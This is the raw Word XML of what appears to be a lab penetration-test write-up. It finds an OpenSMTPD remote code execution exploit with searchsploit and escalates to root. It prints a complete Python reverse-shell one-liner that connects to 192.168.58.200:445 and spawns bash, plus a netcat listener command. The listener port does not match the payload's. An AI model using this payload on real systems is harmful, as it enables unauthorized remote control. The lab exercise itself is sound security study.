      <w:r>
        <w:t xml:space="preserve">After running </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we couldn’t find any valid credentials. S</w:t>
      </w:r>
      <w:r w:rsidR="0010468D">
        <w:t xml:space="preserve">ince the brute force </w:t>
      </w:r>
      <w:r w:rsidR="00E47F0E">
        <w:t>failed,</w:t>
      </w:r>
      <w:r w:rsidR="0010468D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E47F0E">
        <w:t xml:space="preserve">we decided to look for other attack vectors. To do this we use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E47F0E" w:rsidRPr="00E47F0E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E47F0E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E47F0E">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="002505C0">
        <w:t xml:space="preserve">ool, which is a database of known exploits. </w:t>
      </w:r>
      <w:r w:rsidR="00965492">
        <w:t xml:space="preserve">The command is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00965492">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00965492">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00965492">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OpenSMTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00965492">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -w</w:t>
      </w:r>
      <w:r w:rsidR="00ED0E59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00ED0E59">
        <w:t xml:space="preserve">With this command </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00ED0E59">
        <w:t>we’ll</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00ED0E59">
        <w:t xml:space="preserve"> search the database for allow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00ED0E59">
        <w:t>OpenSMTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00ED0E59">
        <w:t xml:space="preserve"> exploits, and it will also provide us with the url to the </w:t>
      </w:r>
      <w:r w:rsidR="00E0541D">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00ED0E59">
        <w:t xml:space="preserve">xploit </w:t>
      </w:r>
      <w:r w:rsidR="00E0541D">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00ED0E59">
        <w:t>atabase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F95194A" w14:textId="2171CDD2" w:rsidR="00ED0E59" w:rsidRDefault="00B15D72">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="545079A7" wp14:editId="68EB2EDD">
            <wp:extent cx="5943600" cy="1993265"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985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0942" w14:textId="1CDC0E9C" w:rsidR="00DF2C8B" w:rsidRDefault="00C34A8B">
      <w:r>
        <w:t>We can see that there is a Remote Code Execution</w:t>
      </w:r>
      <w:r w:rsidR="00DF2C8B">
        <w:t xml:space="preserve"> vulnerability, and we can get more details by clicking the link.</w:t>
      </w:r>
      <w:r w:rsidR="00B061D4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D30AF">
        <w:t>From the web page we will download the exploit.</w:t>
      </w:r>
      <w:r w:rsidR="00547590">
        <w:t xml:space="preserve"> Then we run the command to view the usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41294233" w14:textId="263463B7" w:rsidR="00547590" w:rsidRDefault="00527F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DFA30FE" wp14:editId="229B608C">
            <wp:extent cx="5943600" cy="833120"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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3454" w14:textId="7F1C8482" w:rsidR="00CC19EF" w:rsidRPr="00243275" w:rsidRDefault="00502991">
      <w:r>
        <w:t xml:space="preserve">We can test it by setting up an HTTP server to see if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it’ll</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> force the SMTP service to contact our p</w:t>
      </w:r>
      <w:r w:rsidR="008B1146">
        <w:t>hp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP server</w:t>
      </w:r>
      <w:r w:rsidR="000F781E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00243275">
        <w:t xml:space="preserve"> We will use this p</w:t>
      </w:r>
      <w:r w:rsidR="008B1146">
        <w:t>hp</w:t>
      </w:r>
      <w:r w:rsidR="00243275">
        <w:t xml:space="preserve"> command </w:t>
      </w:r>
      <w:r w:rsidR="00243275" w:rsidRPr="00243275">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00243275" w:rsidRPr="00243275">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="0071129F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>hp</w:t>
      </w:r>
      <w:r w:rsidR="00243275" w:rsidRPr="00243275">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="0071129F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00243275" w:rsidRPr="00243275">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0071129F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>192.168.65.</w:t>
      </w:r>
      <w:r w:rsidR="008B1146">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>200:</w:t>
      </w:r>
      <w:r w:rsidR="00243275" w:rsidRPr="00243275">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidR="00243275" w:rsidRPr="00243275">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00243275">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00243275">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="007A6A44">
        <w:t>set up a HTTP server on port 80 and then use the 47984.py to contact the server</w:t>
      </w:r>
      <w:r w:rsidR="00A76D73">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3997D764" w14:textId="076DAB83" w:rsidR="005D30AF" w:rsidRDefault="00E520BD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3514B84F" wp14:editId="3CD30B84">
            <wp:extent cx="5811061" cy="981212"/>
            <wp:effectExtent l="0" t="0" r="0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6AED" w14:textId="20CE9B10" w:rsidR="00E520BD" w:rsidRDefault="0008063A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="311F892F" wp14:editId="3BB17550">
            <wp:extent cx="5896798" cy="1552792"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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3623" w14:textId="77777777" w:rsidR="007270B5" w:rsidRDefault="0072435F">
      <w:r>
        <w:t xml:space="preserve">As you can see </w:t>
      </w:r>
      <w:r w:rsidR="0071129F">
        <w:t>the exploit attempts to connect to our PHP server.</w:t>
      </w:r>
      <w:r w:rsidR="008C7613">
        <w:t xml:space="preserve"> Now we will use</w:t>
      </w:r>
      <w:r w:rsidR="00584929">
        <w:t xml:space="preserve"> a python script</w:t>
      </w:r>
      <w:r w:rsidR="008C7613">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00584929">
        <w:t>create</w:t>
      </w:r>
      <w:r w:rsidR="008C7613">
        <w:t xml:space="preserve"> a reverse shell </w:t>
      </w:r>
      <w:r w:rsidR="003F2450">
        <w:t>so we can gain access to the target machine.</w:t>
      </w:r>
      <w:r w:rsidR="005D5C62">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8C8864" w14:textId="1A27F6E2" w:rsidR="007270B5" w:rsidRDefault="007270B5">
      <w:r>
        <w:t xml:space="preserve">After a break I accessed the network again and determined that the IP addresses had changed so from here </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>we’ll</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be working in the 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00962653">
        <w:t>58</w:t>
      </w:r>
      <w:r>
        <w:t>.0/24 network range</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBE6A6E" w14:textId="7CFD971C" w:rsidR="00913483" w:rsidRDefault="005D5C62">
      <w:r>
        <w:t>We will use the follo</w:t>
      </w:r>
      <w:r w:rsidR="00A04F78">
        <w:t xml:space="preserve">wing command to create the payload: </w:t>
      </w:r>
      <w:r w:rsidR="00FC0004">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">python -c "import socket, subprocess, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>s=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>socket.AF_INET,socket.SOCK_STREAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>s.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>((\"&lt;192.168.</w:t>
      </w:r>
      <w:r w:rsidR="003B3E02">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.200</w:t>
      </w:r>
      <w:r w:rsidR="003B3E02">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;", &lt;445&gt;)); os.dup2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(),0); os.dup2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(),1); os.dup2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">(),2);import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC0004" w:rsidRPr="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(\"/bin/bash\")"</w:t>
      </w:r>
      <w:r w:rsidR="00FC0004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0F81DC" w14:textId="7DF5BACC" w:rsidR="00796741" w:rsidRDefault="00962653">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="570C16AC" wp14:editId="6A919976">
            <wp:extent cx="5943600" cy="1467485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FF1" w14:textId="7FA56668" w:rsidR="000C00D2" w:rsidRDefault="00584929">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidR="00273C35">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">now </w:t>
      </w:r>
      <w:r w:rsidR="00273C35">
        <w:t xml:space="preserve">set up our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00144282">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00273C35">
        <w:t xml:space="preserve"> server to listen on the port </w:t>
      </w:r>
      <w:r w:rsidR="00B07A9B">
        <w:t>we established in out payload, port 44</w:t>
      </w:r>
      <w:r w:rsidR="00144282">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00B07A9B">
        <w:t xml:space="preserve">. We can do this </w:t>
      </w:r>
      <w:r w:rsidR="004A099C">
        <w:t>with the following command, ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00144282">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A099C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00144282">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A099C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C0230B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidR="004A099C">
        <w:t>’.</w:t>
      </w:r>
      <w:r w:rsidR="00C437F0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0070367D">
        <w:t>We can now run the payload and listen for a response</w:t>
      </w:r>
      <w:r w:rsidR="00EA5631">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005C481F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07569347" w14:textId="459A1C1E" w:rsidR="00C437F0" w:rsidRDefault="00C437F0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4435724E" wp14:editId="1D26E8B5">
            <wp:extent cx="5943600" cy="967740"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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511C" w14:textId="59497376" w:rsidR="00E06508" w:rsidRPr="00D94B6E" w:rsidRDefault="00FF66C7">
      <w:r>
        <w:t>As you can see, we now have root access on this machine. We can now look for the proof.txt</w:t>
      </w:r>
      <w:r w:rsidR="00D94B6E">
        <w:t xml:space="preserve"> using the ‘</w:t>
      </w:r>
      <w:r w:rsidR="00D94B6E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">ls -al’ </w:t>
      </w:r>
      <w:r w:rsidR="00D94B6E">
        <w:t>command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68732421" w14:textId="00B3E66B" w:rsidR="00FF66C7" w:rsidRPr="00EA5631" w:rsidRDefault="00D94B6E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="109B41F5" wp14:editId="76BD6702">
            <wp:extent cx="5943600" cy="2458085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6C7" w:rsidRPr="00EA56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D4C"/>
    <w:rsid w:val="0000024F"/>
    <w:rsid w:val="00014AE1"/>
    <w:rsid w:val="000335D8"/>
    <w:rsid w:val="00035F92"/>
    <w:rsid w:val="000540BF"/>
    <w:rsid w:val="00072D62"/>
    <w:rsid w:val="00073E58"/>
    <w:rsid w:val="0008063A"/>
    <w:rsid w:val="00090ABF"/>
    <w:rsid w:val="00092B90"/>
    <w:rsid w:val="000A065C"/>
    <w:rsid w:val="000B2330"/>
    <w:rsid w:val="000C00D2"/>
    <w:rsid w:val="000D039E"/>
    <w:rsid w:val="000D589D"/>
    <w:rsid w:val="000F781E"/>
    <w:rsid w:val="0010468D"/>
    <w:rsid w:val="00115070"/>
    <w:rsid w:val="00140FD6"/>
    <w:rsid w:val="00144282"/>
    <w:rsid w:val="0016741F"/>
    <w:rsid w:val="00172E47"/>
    <w:rsid w:val="001B4509"/>
    <w:rsid w:val="001C27B6"/>
    <w:rsid w:val="001E3203"/>
    <w:rsid w:val="001E4EEA"/>
    <w:rsid w:val="00243275"/>
    <w:rsid w:val="0024779D"/>
    <w:rsid w:val="002505C0"/>
    <w:rsid w:val="00273C35"/>
    <w:rsid w:val="00280AE6"/>
    <w:rsid w:val="00290949"/>
    <w:rsid w:val="00297C2E"/>
    <w:rsid w:val="002A5847"/>
    <w:rsid w:val="002C0C9B"/>
    <w:rsid w:val="002C2BE2"/>
    <w:rsid w:val="002E6D4C"/>
    <w:rsid w:val="002E7707"/>
    <w:rsid w:val="00310F48"/>
    <w:rsid w:val="00363573"/>
    <w:rsid w:val="0037521E"/>
    <w:rsid w:val="003B3E02"/>
    <w:rsid w:val="003C61DA"/>
    <w:rsid w:val="003D6910"/>
    <w:rsid w:val="003F2450"/>
    <w:rsid w:val="0041448E"/>
    <w:rsid w:val="004200C4"/>
    <w:rsid w:val="00437703"/>
    <w:rsid w:val="00455B50"/>
    <w:rsid w:val="004650AA"/>
    <w:rsid w:val="00495042"/>
    <w:rsid w:val="004A099C"/>
    <w:rsid w:val="004B65EB"/>
    <w:rsid w:val="004D0D0E"/>
    <w:rsid w:val="005012F4"/>
    <w:rsid w:val="00502991"/>
    <w:rsid w:val="005039B3"/>
    <w:rsid w:val="0050729B"/>
    <w:rsid w:val="0052724C"/>
    <w:rsid w:val="00527F78"/>
    <w:rsid w:val="005346AE"/>
    <w:rsid w:val="005378F4"/>
    <w:rsid w:val="00547590"/>
    <w:rsid w:val="00552992"/>
    <w:rsid w:val="00574FFB"/>
    <w:rsid w:val="00577D33"/>
    <w:rsid w:val="00584929"/>
    <w:rsid w:val="005A22FA"/>
    <w:rsid w:val="005A4E20"/>
    <w:rsid w:val="005B33DB"/>
    <w:rsid w:val="005B6D60"/>
    <w:rsid w:val="005C481F"/>
    <w:rsid w:val="005D1CAD"/>
    <w:rsid w:val="005D30AF"/>
    <w:rsid w:val="005D5C62"/>
    <w:rsid w:val="00604354"/>
    <w:rsid w:val="006103C8"/>
    <w:rsid w:val="00613215"/>
    <w:rsid w:val="00631B07"/>
    <w:rsid w:val="0063245C"/>
    <w:rsid w:val="00635E0D"/>
    <w:rsid w:val="00644546"/>
    <w:rsid w:val="00660518"/>
    <w:rsid w:val="00686199"/>
    <w:rsid w:val="006A0EA3"/>
    <w:rsid w:val="006A35E2"/>
    <w:rsid w:val="006C36E1"/>
    <w:rsid w:val="006C3BFE"/>
    <w:rsid w:val="006C62D2"/>
    <w:rsid w:val="006C7B2B"/>
    <w:rsid w:val="006D1C15"/>
    <w:rsid w:val="006E1B0F"/>
    <w:rsid w:val="006E77B8"/>
    <w:rsid w:val="007008D2"/>
    <w:rsid w:val="0070367D"/>
    <w:rsid w:val="00705ED9"/>
    <w:rsid w:val="00706D5E"/>
    <w:rsid w:val="0071129F"/>
    <w:rsid w:val="0072435F"/>
    <w:rsid w:val="007270B5"/>
    <w:rsid w:val="00747DF8"/>
    <w:rsid w:val="00766F79"/>
    <w:rsid w:val="00796741"/>
    <w:rsid w:val="007A6A44"/>
    <w:rsid w:val="007B41A7"/>
    <w:rsid w:val="007C005D"/>
    <w:rsid w:val="007D3B07"/>
    <w:rsid w:val="007F35B1"/>
    <w:rsid w:val="008635DE"/>
    <w:rsid w:val="008721CA"/>
    <w:rsid w:val="00882D41"/>
    <w:rsid w:val="008A1A63"/>
    <w:rsid w:val="008B1146"/>
    <w:rsid w:val="008C4E18"/>
    <w:rsid w:val="008C5BC3"/>
    <w:rsid w:val="008C7613"/>
    <w:rsid w:val="00913483"/>
    <w:rsid w:val="00962653"/>
    <w:rsid w:val="00965492"/>
    <w:rsid w:val="00975168"/>
    <w:rsid w:val="00975E15"/>
    <w:rsid w:val="00976831"/>
    <w:rsid w:val="00992D5F"/>
    <w:rsid w:val="009C5B69"/>
    <w:rsid w:val="009E75A0"/>
    <w:rsid w:val="00A04F78"/>
    <w:rsid w:val="00A64CBD"/>
    <w:rsid w:val="00A75D3E"/>
    <w:rsid w:val="00A76D73"/>
    <w:rsid w:val="00A86594"/>
    <w:rsid w:val="00A94974"/>
    <w:rsid w:val="00A978FA"/>
    <w:rsid w:val="00AB1581"/>
    <w:rsid w:val="00AF3F45"/>
    <w:rsid w:val="00B061D4"/>
    <w:rsid w:val="00B07A9B"/>
    <w:rsid w:val="00B1566C"/>
    <w:rsid w:val="00B15D72"/>
    <w:rsid w:val="00B3471B"/>
    <w:rsid w:val="00B518A6"/>
    <w:rsid w:val="00B71676"/>
    <w:rsid w:val="00BC50F7"/>
    <w:rsid w:val="00BF6E4F"/>
    <w:rsid w:val="00C0230B"/>
    <w:rsid w:val="00C34A8B"/>
    <w:rsid w:val="00C437F0"/>
    <w:rsid w:val="00C56FD7"/>
    <w:rsid w:val="00C92F8C"/>
    <w:rsid w:val="00C94722"/>
    <w:rsid w:val="00CB3D4D"/>
    <w:rsid w:val="00CB50F0"/>
    <w:rsid w:val="00CC0F67"/>
    <w:rsid w:val="00CC19EF"/>
    <w:rsid w:val="00CE0134"/>
    <w:rsid w:val="00D01075"/>
    <w:rsid w:val="00D01429"/>
    <w:rsid w:val="00D070B6"/>
    <w:rsid w:val="00D13274"/>
    <w:rsid w:val="00D16246"/>
    <w:rsid w:val="00D357ED"/>
    <w:rsid w:val="00D71806"/>
    <w:rsid w:val="00D94B6E"/>
    <w:rsid w:val="00D97851"/>
    <w:rsid w:val="00DA181D"/>
    <w:rsid w:val="00DA3388"/>
    <w:rsid w:val="00DB0A79"/>
    <w:rsid w:val="00DB4ABB"/>
    <w:rsid w:val="00DE1164"/>
    <w:rsid w:val="00DF2C8B"/>
    <w:rsid w:val="00E0541D"/>
    <w:rsid w:val="00E06508"/>
    <w:rsid w:val="00E2650F"/>
    <w:rsid w:val="00E47F0E"/>
    <w:rsid w:val="00E520BD"/>
    <w:rsid w:val="00E91175"/>
    <w:rsid w:val="00EA5631"/>
    <w:rsid w:val="00ED0064"/>
    <w:rsid w:val="00ED0E59"/>
    <w:rsid w:val="00EF0041"/>
    <w:rsid w:val="00F40D5C"/>
    <w:rsid w:val="00F65484"/>
    <w:rsid w:val="00F90858"/>
    <w:rsid w:val="00FA5B64"/>
    <w:rsid w:val="00FB7525"/>
    <w:rsid w:val="00FC0004"/>
    <w:rsid w:val="00FC4D98"/>
    <w:rsid w:val="00FF2EFC"/>
    <w:rsid w:val="00FF6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C1AD8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8F68A2C8-5924-4E33-B406-C3966F2A0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2E6D4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6D4C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00437703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437703"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009751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51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file:///\\\\192.168.65.71\\backups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D19014-1C01-4967-9C87-5AD908BE7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855</Words>
  <Characters>4876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Ocasio</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Giovanni Ocasio</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-04T15:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-04T15:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>